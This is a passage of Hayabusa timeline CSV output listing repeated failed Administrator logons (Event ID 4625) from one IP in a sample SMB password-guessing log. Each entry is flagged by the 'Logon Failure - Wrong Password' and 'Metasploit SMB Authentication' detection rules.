NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JqY8CvyODDLQV9Ps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nPMRIxRVuh13jmZD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jARkTWdKTfTIwlug : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zwhkc71Nfn7QDf7c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.567 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qsYad9PgEajlYqvo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9YPw0DsspVbrOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: wsHpLCOdAOPFM6nD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcNytOhGOZKaREL9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lc5boBVigHE1ccGA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BQXg4ZHdBYHyiTTO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.819 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JebTJzyn91NrpvkD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8wCE5ypjEU5feEEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OglsROoqX48xm0gJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bNC9ES3l3KwXPxb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:44.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: byPavQuiscMm7CMW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UQESAC3XpxCJJfG5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 5aYRnzirSj0PNXAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8s9xJ659geFHOlY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yBQdyO0diiFixwlx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzULtccOFnLIRiVM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pDEGzqTAyUab5P8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gomgb26W9qFacRr7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXOcDu88S5c5VwwV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WHRnzgQkfAhsUguj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0Q9ZIaRK43W9apv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2xvriGeIlDwtzS36 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pDYTFqeJC61Nneef : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0LNR7xCHW9x2q2qc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AE4EBj8X5IfXO8ZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BEOSGw6TjZf9GWS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UCxe24uL4A6R9kgZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8v4DcIRkx43KCIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CY2buVupQ5oR1Cp5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f6c3MlpMEzkCVud2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2wV6op9AU4paDXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNn6aywSs67hVAO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: wUa03SIX69WCIYbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zYi4TB42B2VQm5Tr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9mnUbGMnlrOR8Tv4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CJGMWqgmbXABdPvB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2W9BbDYgC6vhqU3o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6DYsaih1Yhb2uOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q4o93QpJL4pxx94q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lQf1OsHb4lpgMPbl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcJUYelneVqBQjr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I0d6daEeIadJRbBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
